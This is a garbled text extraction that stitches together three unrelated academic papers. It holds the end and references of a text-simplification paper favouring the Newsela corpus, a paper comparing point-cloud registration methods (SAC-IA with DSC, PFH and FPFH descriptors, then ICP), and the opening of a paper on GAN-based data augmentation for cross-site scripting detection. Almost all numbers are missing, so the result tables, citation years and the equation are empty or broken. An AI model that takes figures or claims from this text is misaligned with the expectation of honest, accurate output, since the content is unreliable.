calculations, etc.). we introduced a new, high-quality corpus of professionally simplified news articles, newsela, as an alternative resource, that allowed us to demon- strate simple wikipedia’s inadequacies in compar- ison. we further discussed problems with current simplification evaluation methodology and proposed potential improvements. our goal for this opinion paper is to stimulate progress in text simplification research. simple en- glish wikipedia played a vital role in inspiring sim- plification approaches based on statistical machine translation. however, it has so many drawbacks that we recommend the community to drop it as the standard benchmark set for simplification. other re- sources like the newsela corpus are superior, since they provide a more consistent level of quality, tar- get a particular audience, and approach the size of parallel simple-normal english wikipedia. we be- lieve that simplification is an important area of re- search that has the potential for broader impact be- yond nlp research. but we must first adopt appro- priate data sets and research methodologies. researchers can request the newsela data fol- lowing the instructions at: https://newsela. com/data/ acknowledgments the authors would like to thank dan cogan-drew, jennifer coogan, and kieran sobel from newsela for creating their data and generously sharing it with us. we also thank action editor rada mihalcea and three anonymous reviewers for their thoughtful comments, and ani nenkova, alan ritter and max- ine eskenazi for valuable discussions. this material is based on research sponsored by the nsf under grant iis- . the views and conclusions contained in this publication are those of the authors and should not be interpreted as repre- senting official policies or endorsements of the nsf or the u.s. government. https://newsela.com/data/ https://newsela.com/data/ references allen, d. ( ). a study of the role of relative clauses in the simplification of news texts for learners of english. system, ( ): – . angrosh, m., nomoto, t., and siddharthan, a. ( ). lexico-syntactic text simplification and compression with typed dependencies. in pro- ceedings of the th conference of the euro- pean chapter of the association for computa- tional linguistics (eacl). bach, n., gao, q., vogel, s., and waibel, a. ( ). tris: a statistical sentence simplifier with log- linear models and margin-based discriminative training. in proceedings of th international joint conference on natural language process- ing (ijcnlp). barzilay, r. and lapata, m. ( ). modeling local coherence: an entity-based approach. computa- tional linguistics, ( ): – . callison-burch, c., cohn, t., and lapata, m. ( ). parametric: an automatic evaluation metric for paraphrasing. in proceedings of the nd international conference on computational linguistics (coling). canning, y., tait, j., archibald, j., and crawley, r. ( ). cohesive generation of syntactically simplified newspaper text. in proceedings of the third international workshop on text, speech and dialogue (tsd). carroll, j., minnen, g., pearce, d., canning, y., de- vlin, s., and tait, j. ( ). simplifying text for language-impaired readers. in proceedings of the th conference of the th european conference for computational linguistics (eacl). chandrasekar, r., doran, c., and srinivas, b. ( ). motivations and methods for text simpli- fication. in proceedings of the th conference on computational linguistics (coling). chen, d. l. and dolan, w. b. ( ). collecting highly parallel data for paraphrase evaluation. in proceedings of the th annual meeting of the as- sociation for computational linguistics (acl). chen, h.-b., huang, h.-h., chen, h.-h., and tan, c.-t. ( ). a simplification-translation- restoration framework for cross-domain smt ap- plications. in proceedings of the th interna- tional conference on computational linguistics (coling). collins, m. ( ). head-driven statistical models for natural language parsing. computational lin- guistics, ( ): – . coster, w. and kauchak, d. ( ). simple english wikipedia: a new text simplification task. in pro- ceedings of the th annual meeting of the as- sociation for computational linguistics: human language technologies (acl-hlt). de belder, j. and moens, m.-f. ( ). text simpli- fication for children. in prroceedings of the sigir workshop on accessible search systems. eisenstein, j. ( ). what to do about bad language on the internet. in proceedings of the con- ference of the north american chapter of the as- sociation for computational linguistics: human language technologies (naacl-hlt). elhadad, n. and sutaria, k. ( ). mining a lex- icon of technical terms and lay equivalents. in proceedings of the workshop on bionlp : biological, translational, and clinical language processing. feng, l. ( ). text simplification: a survey. technical report, the city university of new york. filippova, k. and strube, m. ( ). dependency tree based sentence compression. in proceedings of the th international natural language gener- ation conference (inlg). ganitkevitch, j., callison-burch, c., napoles, c., and van durme, b. ( ). learning senten- tial paraphrases from bilingual parallel corpora for text-to-text generation. in proceedings of the conference on empirical methods in natu- ral language processing (emnlp). gasperin, c., maziero, e., specia, l., pardo, t., and aluisio, s. m. ( ). natural language process- ing for social inclusion: a text simplification ar- chitecture for different literacy levels. in proceed- ings of semish-xxxvi seminário integrado de software e hardware. gerber, l. and hovy, e. ( ). improving transla- tion quality by manipulating sentence length. in machine translation and the information soup, pages – . springer. hwang, w., hajishirzi, h., ostendorf, m., and wu, w. ( ). aligning sentences from standard wikipedia to simple wikipedia. in proceed- ings of the conference of the north ameri- can chapter of the association for computational linguistics (naacl). inui, k., fujita, a., takahashi, t., iida, r., and iwakura, t. ( ). text simplification for read- ing assistance: a project note. in proceedings of the nd international workshop on paraphrasing. jaccard, p. ( ). the distribution of the flora in the alpine zone. new phytologist, ( ): – . jurafsky, d., chahuneau, v., routledge, b. r., and smith, n. a. ( ). narrative framing of consumer sentiment in online restaurant reviews. first monday, ( ). kauchak, d. ( ). improving text simplification language modeling using unsimplified text data. in proceedings of the conference of the as- sociation for computational linguistics (acl). kincaid, j. p., fishburne jr, r. p., rogers, r. l., and chissom, b. s. ( ). derivation of new read- ability formulas (automated readability index, fog count and flesch reading ease formula) for navy enlisted personnel. technical report, dtic doc- ument. klebanov, b. b., knight, k., and marcu, d. ( ). text simplification for information-seeking appli- cations. in on the move to meaningful inter- net systems : coopis, doa, and odbase, pages – . springer. klein, d. and manning, c. d. ( ). fast exact inference with a factored model for natural lan- guage parsing. in advances in neural information processing systems. louis, a. and nenkova, a. ( ). what makes writing great? first experiments on article qual- ity prediction in the science journalism domain. transactions of the association for computa- tional linguistics (tacl), : – . miwa, m., saetre, r., miyao, y., and tsujii, j. ( ). entity-focused sentence simplification for relation extraction. in proceedings of the th international conference on computational lin- guistics (coling). monroe, b. l., colaresi, m. p., and quinn, k. m. ( ). fightin’words: lexical feature selection and evaluation for identifying the content of po- litical conflict. political analysis, ( ): – . moraes, p., mccoy, k., and carberry, s. ( ). adapting graph summaries to the users’ read- ing levels. in proceedings of the th interna- tional natural language generation conference (inlg). napoles, c., callison-burch, c., and van durme, b. ( ). evaluating sentence compression: pit- falls and suggested remedies. in proceedings of the workshop on monolingual text-to-text gen- eration. narayan, s. and gardent, c. ( ). hybrid simpli- fication using deep semantics and machine trans- lation. in proceedings of the nd annual meet- ing of the association for computational linguis- tics (acl). petersen, s. and ostendorf, m. ( ). text simpli- fication for language learners: a corpus analysis. in proceedings of the workshop on speech and language technology for education. petersen, s. e. and ostendorf, m. ( ). a ma- chine learning approach to reading level assess- ment. computer speech & language, ( ): – . pitler, e. and nenkova, a. ( ). revisiting read- ability: a unified framework for predicting text quality. in proceedings of the conference on em- pirical methods in natural language processing (emnlp). porter, a., mcmaken, j., hwang, j., and yang, r. ( ). common core standards the new us intended curriculum. educational researcher, ( ): – . post, m. ( ). judging grammaticality with tree substitution grammar derivations. in proceedings of the th annual meeting of the association for computational linguistics: human language technologies (acl-hlt). riezler, s., king, t. h., crouch, r., and zaenen, a. ( ). statistical sentence condensation us- ing ambiguity packing and stochastic disambigua- tion methods for lexical-functional grammar. in proceedings of the conference of the north american chapter of the association for compu- tational linguistics: human language technol- ogy (naacl-hlt). scarton, c., de oliveira, m., candido jr, a., gasperin, c., and aluísio, s. m. ( ). sim- plifica: a tool for authoring simplified texts in brazilian portuguese guided by readability assess- ments. in proceedings of the annual con- ference of the north american chapter of the as- sociation for computational linguistics: human language technologies (naacl-hlt). siddharthan, a. ( ). preserving discourse struc- ture when simplifying text. in proceedings of eu- ropean workshop on natural language genera- tion (enlg). siddharthan, a. ( ). syntactic simplification and text cohesion. research on language and com- putation, ( ): – . siddharthan, a. ( ). a survey of research on text simplification. special issue of international journal of applied linguistics, ( ). siddharthan, a. and angrosh, m. ( ). hybrid text simplification using synchronous dependency grammars with hand-written and automatically harvested rules. in proceedings of the th inter- national conference on computational linguis- tics (coling). siddharthan, a. and copestake, a. ( ). generat- ing anaphora for simplifying text. in proceedings of the th discourse anaphora and anaphor res- olution colloquium (daarc). siddharthan, a. and katsos, n. ( ). reformulat- ing discourse connectives for non-expert readers. in proceedings of the annual conference of the north american chapter of the association for computational linguistics: human language technologies (naacl-hlt). siddharthan, a., nenkova, a., and mckeown, k. ( ). syntactic simplification for improving content selection in multi-document summariza- tion. in proceedings of the th international conference on computational linguistics (col- ing). vanderwende, l., suzuki, h., brockett, c., and nenkova, a. ( ). beyond sumbasic: task- focused summarization with sentence simplifica- tion and lexical expansion. information process- ing & management, ( ): – . vickrey, d. and koller, d. ( ). sentence simpli- fication for semantic role labeling. in proceed- ings of the th annual meeting of the associa- tion for computational linguistics: human lan- guage technologies (acl-hlt). watanabe, w. m., junior, a. c., uzêda, v. r., fortes, r. p. d. m., pardo, t. a. s., and aluísio, s. m. ( ). facilita: reading assistance for low- literacy readers. in proceedings of the th acm international conference on design of communi- cation. weese, j., ganitkevitch, j., and callison-burch, c. ( ). paradigm: paraphrase diagnos- tics through grammar matching. in proceedings of the th conference of the european chapter of the association for computational linguistics (eacl). williams, s., reiter, e., and osman, l. ( ). ex- periments with discourse-level choices and read- ability. in proceedings of the european natural language generation workshop (enlg). woodsend, k. and lapata, m. ( a). learning to simplify sentences with quasi-synchronous gram- mar and integer programming. in proceedings of the conference on empirical methods in natural language processing (emnlp). woodsend, k. and lapata, m. ( b). wikisimple: automatic simplification of wikipedia articles. in proceedings of the th conference on artificial intelligence (aaai). wubben, s., van den bosch, a., and krahmer, e. ( ). sentence simplification by monolingual machine translation. in proceedings of the th annual meeting of the association for computa- tional linguistics (acl). xu, w. and grishman, r. ( ). a parse-and-trim approach with information significance for chi- nese sentence compression. in proceedings of the workshop on language generation and summarisation. xu, w., ritter, a., dolan, b., grishman, r., and cherry, c. ( ). paraphrasing for style. in pro- ceedings of the th international conference on computational linguistics (coling). xu, w., ritter, a., and grishman, r. ( ). gather- ing and generating paraphrases from twitter with application to normalization. in proceedings of the sixth workshop on building and using com- parable corpora (bucc). zhu, z., bernhard, d., and gurevych, i. ( ). a monolingual tree-based translation model for sen- tence simplification. in proceedings of the rd international conference on computational lin- guistics (coling). paper title (use style: paper title) international journal of advanced network, monitoring and controls volume , no. , doi: . /ijanmc- - comparison of several different registration algorithms liu lulu school of computer science and engineering xi’an technological university xi’an, china e-mail: @qq.com liu baolong school of computer science and engineering xi’an technological university xi’an, china e-mail: liu.bao.long@hotmail.com abstract—the common point cloud registration algorithms are usually divided into initial registration and precise registration. in this paper, sac-ia algorithm, which is commonly used in pcl, is selected for initial registration, and the traditional icp algorithm is used for accurate registration. three different feature descriptors ( d shape context, point feature histograms, fast point feature histograms) are used to realize sac- ia algorithm and icp precise registration algorithm. during the implementation of the algorithm, the registration time and registration error of point cloud are calculated; according to the experimental results, the registration time and registration error of sac-ia algorithm and icp algorithm based on three different descriptors are compared. the results show that the registration algorithm based on d shape context has high accuracy, but the registration time is too long, which is not suitable for a large number of point cloud data; the registration algorithm based on fast point feature histograms has short registration time and good registration effect. keywords-point cloud registration; sac-ia algorithm; icp algorithm; registration time; registration error i. introduction with the rapid development of computer-aided design and computer-aided manufacturing technology, reverse engineering technology, which generates digital model through physical model, has been widely concerned. in reverse engineering, computer vision, d image processing and other fields, it is difficult to obtain all the data of the measured object in all directions at one time due to the influence of data acquisition equipment, the shape of the d object itself, external environment and so on. usually, the point cloud data of three-dimensional objects are acquired from different angles by data acquisition equipment for many times, and the point cloud registration algorithm is used to splice the point clouds of various perspectives into the complete point cloud data. point cloud registration is an important and difficult part of reverse engineering. the registration degree between point clouds will directly affect the accuracy of the whole d model, so point cloud registration has become a research hotspot in the field of point cloud processing. point cloud registration includes manual registration, instrument dependent registration and automatic registration, point cloud automatic registration algorithm is usually used. automatic registration of point cloud is to calculate the dislocation between two groups of point clouds by algorithm, so as to achieve the purpose of automatic registration of point clouds. from the process of registration, it can be divided into two schemes: initial registration and accurate registration. the initial registration provides the initial transformation matrix for the accurate registration. the accurate registration is the secondary registration based on the initial transformation matrix, which can get more accurate solution and improve the final registration accuracy. common registration algorithms include icp algorithm[ ], ndt algorithm[ ], sac-ia algorithm, etc. among them, the accurate registration has been basically fixed to use icp algorithm and various improved algorithms[ ]~[ ]. icp algorithm has high accuracy, but it has strict requirements on the initial matrix. the results of the initial registration are not ideal, which will seriously affect the performance of the algorithm, so that the iteration cannot converge to the global optimal registration results, and even lead to the local optimal situation. therefore, the initial registration algorithm is also very important in the registration process important. in this paper, sac-ia algorithm and icp accurate registration algorithm based on three different descriptors are selected to perform initial registration and accurate registration for two groups of point cloud international journal of advanced network, monitoring and controls volume , no. , data collected from different angles. finally, the experimental results are compared to compare the advantages and disadvantages of several different descriptors in the initial registration algorithm and accurate registration algorithm, and the descriptor more suitable for sac-ia algorithm and icp algorithm are selected. ii. point cloud registrations the principle of point cloud registration algorithm is to match the source point cloud q to the reference system of the target point cloud p through the transformation matrix, that is, p = r * q + t, where r is the rotation transformation matrix and t is the translation transformation matrix. the essence of point cloud registration algorithm is the process of solving r and t. the specific implementation steps are as follows: step . extract key points from two sets of point cloud data sets according to the same key point selection criteria; step . calculate the feature descriptors of all the selected key points; step . combined with the coordinate position of the feature descriptors in the two sets of point cloud data sets, based on the similarity of the features and positions between the two sets of point cloud data sets, the corresponding relationship between them is estimated, and the corresponding point pairs are preliminarily estimated; step . for the noise problem of point cloud data, remove the wrong corresponding point pairs that have influence on registration; step . use the residual correct correspondence to estimate the rigid body transformation and complete the registration. iii. sample consensus initial alignment the initial registration is to prepare for the subsequent accurate registration. the initial registration is carried out for two pieces of point clouds, and the initial values of translation matrix and rotation matrix are calculated. then the point cloud data to be registered is transformed into a unified coordinate system, providing a better initial position for accurate registration. for the rough estimation of the initial transformation matrix, greedy initial registration method has a lot of work, using the point cloud data rotation invariant feature, and the computational complexity is high, so it is necessary to check all possible correspondence of the feature descriptors; in addition, greedy algorithm may fall into the local optimal solution. therefore, for the initial registration method of point cloud, we usually choose the sampling consistency method to try to maintain the geometric relationship of the same correspondence, rather than trying to understand all combinations of finite correspondence. sample consistence initial alignment (sac-ia for short) algorithm takes a large number of samples from the candidate correspondence, and quickly finds a good transformation by looking at a large number of correspondences. until the best rotation and translation errors are obtained and stored. in the initial registration algorithm of point cloud, d point cloud feature description and extraction is the most basic step, and also the most critical part of the initial registration algorithm of sampling consistency. sampling consistency registration algorithm is based on local feature description. this chapter mainly realizes the initial registration algorithm of sampling consistency based on three descriptors: d shape content descriptors, point feature histogram descriptors and fast point feature histogram descriptors, the optimal results of the initial registration algorithm are obtained by experiments. a. d shape context d shape context ( dsc for short) uses a vector to describe the shape features of the specified points and their fields on the surface, and establishes the corresponding relationship between the points of different surfaces by matching the values of the vector, which is the descriptor of the specified points. dsc descriptors are simple in structure, strong in discrimination and insensitive to noise. the construction method is as follows: in the spherical support domain with designated point p as the center, the grid is divided into three coordinate directions: radial direction, direction angle and pitch angle, the number of points falling into the grid is counted, and the vector v is constructed. each element of v corresponds to a grid in the support domain. the value of the element is the number of points in the corresponding grid. the vector v is the descriptor of point p[ ]. dsc grid division is shown in fig. . b. point feature histograms point feature histograms (pfh for short) refer to the spatial differences between query points and neighboring points by parameterization, and form a multi-dimensional histogram to describe the neighbor geometric properties of point k. the high-dimensional hyperspace of histogram provides a measurable international journal of advanced network, monitoring and controls volume , no. , information space for feature representation, which is invariant to the -dimensional pose of the corresponding surface of point cloud, and robust under different sampling density or neighborhood noise level. pfh representation is based on the relationship between points and their k neighbors and their estimated normal, considering all the interactions between normal directions, trying to capture the best change of sample surface to describe the geometric characteristics of samples. therefore, the synthetic feature hyperspace depends on the quality of the surface discovery estimation of each point. fig. shows the influence area of pfh calculation of a query point . is marked in red and placed in the middle of the ball. the radius is r, and all k-neighbor elements of (all points whose distance from point is less than radius r) are all connected in a network. the final pfh descriptor get histogram by calculating the relationship between all two points in the domain. figure . dsc mesh generation figure . influence range chart of pfh calculation at query point c. fast point feature histograms fast point feature histograms[ ](fpfh for short) is a feature descriptor based on the normal angle between points and their neighbors and the angle between the lines between points. it is an improved algorithm by pfh, which retains the main geometric characteristics of point-to-point description in pfh, and reduces the computational complexity from to , where n is the number of points in the point cloud data, and k is the number of neighbors considered when calculating the eigenvector of each point. for a persistent query point , fpfh first uses the pairing between and its neighborhood points (represented by the red line in fig. ) to estimate its simplified point feature histograms (spfh) value. compared with the standard calculation of pfh, fpfh has less inter neighborhood interconnection. all points in the point cloud data set need to calculate and obtain spfh, and calculate the weight according to the spfh value of the adjacent point of point and the spfh value of point, and finally get the fpfh value of point. for the calculation connection pairs added in fpfh calculation, the black line in fig. indicates that some important point pairs (points directly connected with points) are represented by repeated cardinality twice (the thick line in fig. indicates), and other connected points are represented by thin black line. figure . fpfh calculation neighborhood influence range of query point d. experimental verification in this experiment, the classic bunny point cloud model of stanford university (as shown in fig. (a)) is used to compare the efficiency and accuracy of the three algorithms. finally, the tooth point cloud collected by the laboratory point cloud acquisition equipment (as shown in fig. (b)) is registered to verify the feasibility of the algorithm comparison results. in fig. , the green point cloud is the source point cloud and the red point cloud is the target point cloud. in bunny point cloud model, the number of source point cloud is , and the number of target point cloud is ; the number of tooth point cloud international journal of advanced network, monitoring and controls volume , no. , data source point cloud collected in laboratory is , and the number of target point cloud is . (a) bunny model (b) tooth point cloud model figure . point cloud data model the general evaluation standard of point cloud registration is lcp (largest common pointset). that is to say, given two groups of point set p and q, a transformation t (p) is found, which makes the maximum overlap of p and q after transformation. if there is another q point in the tolerance range at any point in the transformed p, it is considered to be a coincidence point. the proportion of coincident points to the number of all points is the degree of overlap. in this paper, the registration accuracy is determined by the rotation and translation errors and distance errors of the registration point cloud relative to the target point cloud on the x-axis, y-axis and z-axis. compared with lcp, the registration accuracy of the point cloud can be more intuitively expressed. the experimental results of sac-ia algorithm registration based on dsc, pfh and fpfh feature descriptors are shown in fig. , among them, the red point cloud is the target point cloud, and the blue point cloud is the registered point cloud. (a) dsc+sac-ia (b) pfh+sac-ia (c) fpfh+sac-ia figure . initial registration results the registration time, rotation angle error on xyz axis, translation distance error and distance error between registration point cloud and target point cloud of two sets of bunny point cloud are shown in table i. table i. initial registration error table comparison of registration algorithms feature descriptors dsc pfh fpfh sac-ia runtime . s . s . s x-axis rotation error . ° . ° . ° y-axis rotation error . ° . ° . ° z-axis rotation error - . ° - . ° - . ° x-axis translation error . mm . mm . mm y-axis translation error - . mm - . mm - . mm z-axis translation error - . mm - . mm - . mm distance error . mm . mm . mm in terms of algorithm efficiency, dsc needs to calculate the surface shape characteristics of point cloud, which increases the calculation amount; compared with pfh and fpfh, it takes a long time, and fpfh is an improved algorithm based on pfh, that is, fpfh algorithm is more efficient and takes the shortest time. in terms of algorithm accuracy, the smaller the rotation, translation and distance errors of x-axis, y-axis and z-axis are, the higher the accuracy of the algorithm is. from table i, it can be seen that the accuracy of dsc algorithm combined with sac-ia algorithm is higher than that of fpfh and pfh algorithm. therefore, the experimental results show that the algorithm based on fpph feature descriptor has the shortest registration time and the highest efficiency, and the algorithm based on dsc feature descriptor has relatively high accuracy. iv. iterative closest point through the initial registration, the two sets of point cloud data roughly coincide, but the registration accuracy is still far from the requirements of practical applications. therefore, accurate registration of point cloud data is required to reduce registration errors. in order to register the two groups of point cloud as much as possible and minimize the error between them, this paper uses the classic iterative closest point (icp for short) algorithm for accurate registration. icp algorithm[ ][ ] is the mainstream algorithm for d model registration. for each point in the source point cloud, an exhaustive search method is used in the target point cloud to search for the closest point as the international journal of advanced network, monitoring and controls volume , no. , corresponding point; then the transformation matrix of all corresponding point pairs is registered and aligned, and the source point cloud is finally calculated according to the obtained transformation matrix is transformed. if the measurement error is not considered, the accuracy of the icp algorithm is affected by the measurement sampling density, and the error value is proportional to the average sampling distance. that is, the higher the sampling density, the higher the accuracy of the stitching. the basic principle of icp algorithm is to find the nearest point in the target point cloud p and source point cloud q to be registered according to certain constraints, and then calculate the optimal matching parameter rotation matrix r and translation matrix t to minimize the error function. the error function conforms to equation ( ).    n i ii trpq n trf ||)(|| ),( ( ) where n is the number of nearest neighbor point pairs, is a point in the target point cloud p, is the nearest point corresponding to in the source point cloud q, r is the rotation matrix, and t is the translation matrix. a. experimental verification according to the initial registration results, the point cloud data is accurately registered by the icp algorithm. the sca-ia algorithm based on the dsc, pfh, and fphf feature descriptors combined with the accurate results of icp is shown in fig. . (a) dsc+icp (b) pfh+icp (c) fpfh+icp figure . accurate registration results after icp precise registration, the initial registration time, precise registration time, rotation angle error on xyz axis, translation distance error, and the distance error between the two point clouds of the registration point cloud and the target point cloud are as follows: table ii. table ii. accurate registration error table comparison of registration algorithms feature descriptors dsc pfh fpfh total time . s . s . s sac-ia runtime . s . s . s icp runtime . s . s . s x-axis rotation error . ° . ° . ° y-axis rotation error . ° . ° . ° z-axis rotation error - . ° - . ° - . ° x-axis translation error . mm . mm . mm y-axis translation error - . mm - . mm - . mm z-axis translation error - . mm - . mm - . mm distance error . mm . mm . mm as can be seen from table ii, in terms of algorithm efficiency, the sac-ia algorithm based on the fpfh feature descriptor combined with the icp algorithm is relatively shorter. from the perspective of algorithm accuracy, the registration accuracy of sac-ia algorithm based on dsc, pfh, fpfh feature descriptors and icp precise registration algorithm is not much different. therefore, for the dental point cloud model collected in the laboratory, the accuracy of the three descriptors is not much different, but in terms of efficiency, the fpfh descriptor is more suitable for point cloud data with a large amount of data. therefore, the tooth model is registered using the sac-ia algorithm based on the fpfh feature descriptor and the icp precise registration algorithm. the registration result is shown in fig. . figure . tooth model registration results international journal of advanced network, monitoring and controls volume , no. , v. conclusion in this paper, based on the sac-ia algorithm of dsc, pfh and fpfh, the bunny point cloud is registered, and the efficiency and accuracy of the initial registration algorithm are analyzed and compared. in the initial registration, sac-ia algorithm based on dsc feature descriptor has a relatively high accuracy, but it takes a long time, which is suitable for the registration with a small number of point clouds and high accuracy requirements; sac-ia algorithm based on fpfh feature descriptor has a high efficiency, which is suitable for the registration with a large number of point clouds and high efficiency requirements. for the accurate registration algorithm, the icp algorithm of pcl is used in this paper, and the effect is not ideal from the registration results; in addition, the icp algorithm can be improved to improve the overall accuracy of the registration algorithm. acknowledgment the successful completion of this paper cannot be separated from the help of teachers, students and funds. thanks to professor liu baolong, mr. wu qiong and mr. si lipeng for their guidance and help. finally, i would like to thank the science and technology program of weiyang district of xi'an city (project no.: ) for its fund support. references [ ] besl p j, mckay h d. a method for registration of -d shapes[j]. ieee transactions on pattern analysis and machine intelligence, , ( ): - . [ ] peter biber and wolfgang straßer. the normal distributions transform: a new approach to laser scan matching. in proceedings of the ieee international conference on intelligent robots and systems (iros), pages – , las vegas, usa, october . [ ] greenspan m, yurick m. [ieee fourth international conference on -d digital imaging and modeling, . dim . - banff, alberta, canada ( - oct. )] fourth international conference on -d digital imaging and modeling, . dim . proceedings. - approximate k-d tree search for efficient icp[j]. : - . [ ] andreas nüchter, lingemann k, hertzberg j . cached k-d tree search for icp algorithms[c]// sixth international conference on -d digital imaging and modeling, dim , - august , montreal, quebec, canada. ieee, . [ ] timothée jost, heinz hügli. fast icp algorithms for shape registration[m]// pattern recognition. springer berlin heidelberg, . [ ] silva l, bellon o r, boyer k l. precision range image registration using a robust surface interpenetration measure and enhanced genetic algorithms. [j]. ieee transactions on pattern analysis & machine intelligence, , ( ): - . [ ] du s, liu j, zhang c, zhu j, & li k. probability iterative closest point algorithm for m-d point set registration with noise[j]. neurocomputing, , : - . [ ] chetverikov d, stepanov d, krsek p. robust euclidean alignment of d point sets: the trimmed iterative closest point algorithm[j]. image and vision computing, , ( ): - . [ ] zhu dehai. pcl course of dianyun library[m]: beijing university of aeronautics and astronautics, . [ ] frome a, huber r, kolluri t, buelow m.j. recognizing objects in range data using regional point descriptors. proceedings of the european conference on computer vision (eccv), prague, czech republic, – may ; , pp. – . [ ] rusu r b, blodow n, beetz m. fast point feature histograms (fpfh) for d registration[c]// robotics and automation, . icra ' . ieee international conference on. ieee, . [ ] zhang z. iterative point matching for registration of free-form curves and surfaces[j]. international journal of computer vision, , ( ): - . [ ] chen y, gérard medioni. object modeling by registration of multiple range images[j]. image and vision computing, , ( ): - . submitted august accepted november published december corresponding author fawaz mahiuob mohammed mokbal, fawaz@emails.bjut.edu.cn academic editor shuihua wang additional information and declarations can be found on page doi . /peerj-cs. copyright mokbal et al. distributed under creative commons cc-by . open access data augmentation-based conditional wasserstein generative adversarial network-gradient penalty for xss attack detection system fawaz mahiuob mohammed mokbal , ,*, dan wang ,*, xiaoxi wang and lihua fu college of computer science, faculty of information technology, beijing university of technology, beijing, china faculty of computer science, ilma university, karachi, pakistan state grid management college, beijing, china * these authors contributed equally to this work. abstract the rapid growth of the worldwide web and accompanied opportunities of web applications in various aspects of life have attracted the attention of organizations, governments, and individuals. consequently, web applications have increasingly become the target of cyberattacks. notably, cross-site scripting (xss) attacks on web applications are increasing and have become the critical focus of information security experts’ reports. machine learning (ml) technique has significantly advanced and shown impressive results in the area of cybersecurity. however, xss training datasets are often limited and significantly unbalanced, which does not meet well- developed ml algorithms’ requirements and potentially limits the detection system efficiency. furthermore, xss attacks have multiple payload vectors that execute in different ways, resulting in many real threats passing through the detection system undetected. in this study, we propose a conditional wasserstein generative adversarial network with a gradient penalty to enhance the xss detection system in a low- resource data environment. the proposed method integrates a conditional generative adversarial network and wasserstein generative adversarial network with a gradient penalty to obtain necessary data from directivity, which improves the strength of the security system over unbalance data. the proposed method generates synthetic samples of minority class that have identical distribution as real xss attack scenarios. the augmented data were used to train a new boosting model and subsequently evaluated the model using a real test dataset. experiments on two unbalanced xss attack datasets demonstrate that the proposed model generates valid and reliable samples. furthermore, the samples were indistinguishable from real xss data and significantly enhanced the detection of xss attacks compared with state-of-the-art methods. subjects artificial intelligence, computer networks and communications, data mining and machine learning, security and privacy, world wide web and web science keywords data augmentation, conditional-wasserstein generative adversarial net, imbalance dataset, xss attack, web applications security how to cite this article mokbal fmm, wang d, wang x, fu l. . data augmentation-based conditional wasserstein generative ad- versarial network-gradient penalty for xss attack detection system. peerj comput. sci. :e http://doi.org/ . /peerj-cs. https://peerj.com/computer-science mailto:fawaz@emails.bjut.edu.cn https://peerj.com/academic-boards/editors/ https://peerj.com/academic-boards/editors/ http://dx.doi.org/ . /peerj-cs. http://creativecommons.org/licenses/by/ . / http://creativecommons.org/licenses/by/ . / http://doi.org/ . /peerj-cs. introduction over the last decade, the worldwide web has grown exponentially, and web applications are increasingly being deployed to provide sustainable and accessible services to the public. these have attracted the attention of governments, companies, and individuals. similarly, cyberattacks on web applications are increasing; consequently, increasing the severity of web applications and users’ risks. cross-site scripting (xss) attack is one of the prevalent and growing attacks on web applications. successful xss attacks lead to various degrees of consequences for users, governments, and businesses. for the user, xss attacks can be used to steal sensitive user information such as user credentials and session tokens or impersonate the user to carry out authorized actions on behalf of the user. for businesses and governments, xss attacks can be used to change the appearance or behavior of target websites and steal confidential information. these authorities may face dire consequences, including loss of reputation, legal battles, and financial losses (deepa & thilagam, ). cybercriminals exploit security vulnerabilities within web applications often caused by several factors, including the level of application programmers’ experience in security and inheriting vulnerabilities from open-source and third-party packages. these security vulnerabilities could allow cybercriminals to inject malicious content into the html trusted pages displayed to end-users (sarmah, bhattacharyya & kalita, ). state-of-the-art xss attack detection systems are applied on the server-side, client-side, or both. the analysis methods used to distinguish between malignant and benign payload could be static, dynamic, or hybrid (sarmah, bhattacharyya & kalita, ). however, these methods have limitations, such as low detection rate (dr), high false positive (fp)/negative rates, and often not scalable over time (mitropoulos & spinellis, ). therefore, they are inefficient, especially with emerging techniques and evolving forms of xss payloads developed continuously by cybercriminals (lekies et al., ; zhou & wang, ). in , xss attacks became the most widespread attack vectors. approximately % of cyberattacks have been attributed to xss attacks, according to precise security research (precise security, ), which is expected to increase in the future significantly. furthermore, the overall number of new xss vulnerabilities in ( , ) increased by . % compared with that in ( , ) as per the national vulnerabilities database (national institute of standards and technology, ). additionally, there are various reports and warnings from information security experts in industrial control systems vulnerabilities statistics (andreeva et al., ). many studies in related literature used fp as metrics to measure model accuracy instead of dr, which reveals the effect of unbalanced data and can be expensive in the cybersecurity domain (elkan, ). technically, the dr represents the effective detection of attacks and is a critical factor in detection systems. when the dr is not clearly defined, it raises concerns about the cybersecurity system’s effectiveness. consequently, there is an increase in the number of major risks unidentified by various tools/models (deepa & thilagam, ; lekies et al., ). existing machine learning (ml) techniques are proven to be highly efficient in handling security challenges. the algorithms are trained using data of previously known behaviors (supervised learning), and each class of behavior is recognized to be either anomalous or mokbal et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. legitimate. however, web pages are a mixture of multiple languages such as javascript and html, which were formally unstandardized, enabling the use of various coding techniques that are susceptible to attacks. therefore, xss attacks have peculiar and irregular characteristics; further, the volume of labeled data on xss attacks with up-to-date cases is limited and highly unbalanced (obimbo, ali & mohamed, ; nunan et al., ; mokbal et al., ). consequently, applying most standard ml algorithms to xss data in the straightforward are unsuitable and challenging compared with other well-developed clean data domains (vluymans, ; mokbal et al., ). to our best knowledge, the limited and unbalanced data of xss cyber-attack based on ml learning have not been addressed in the literature, which is worth to study. the detection system is invariably affected by the class imbalances problem. specifically, ml algorithms focus on maximizing accuracy, which technically means that all misclassified errors are handled equally and uniformly, implying that the algorithms do not handle unbalanced datasets even if they are accurate and clean (vluymans, ). a learning algorithm may discard instances of the minority class in the dataset in such a problem. the attack samples are often of the minority class and handled as noise while recognizing only samples of the majority class (buda, maki & mazurowsk, ). therefore, the ml-based model design should consider the dataset’s weight and evaluation criteria (vluymans, ). the traditional methods for addressing the challenges of limited and unbalanced data that could be used are oversampling the minority class or undersampling the majority class. yet, each method has its limitations. oversampling can lead to overfitting, whereas undersampling may discard useful data, which subsequently leads to loss of information (vluymans, ). to mitigate the challenges of limited and highly unbalanced xss attack dataset, we proposed a data augmentation method based on the conditional gan and wasserstein gan with a gradient penalty (c-wgan-gp). our proposed method aims to achieve the minority class’s oversampling using a more robust generative approach to rebalancing the training dataset by adding identical and valid samples to the minority class. samples generated based on the minority class’s overall distribution are generalized using the c- wgan-gp generative network instead of local information as the traditional methods do. the generative adversarial network (gan) (goodfellow et al., ) is considered a potential solution to the challenges described above. it is a type of a deep generative model that aims to learn the joint probability distribution of samples and labels from training data, which can be further used for several applications such as predictor training, classifier, and data augmentations (pan et al., ). the main 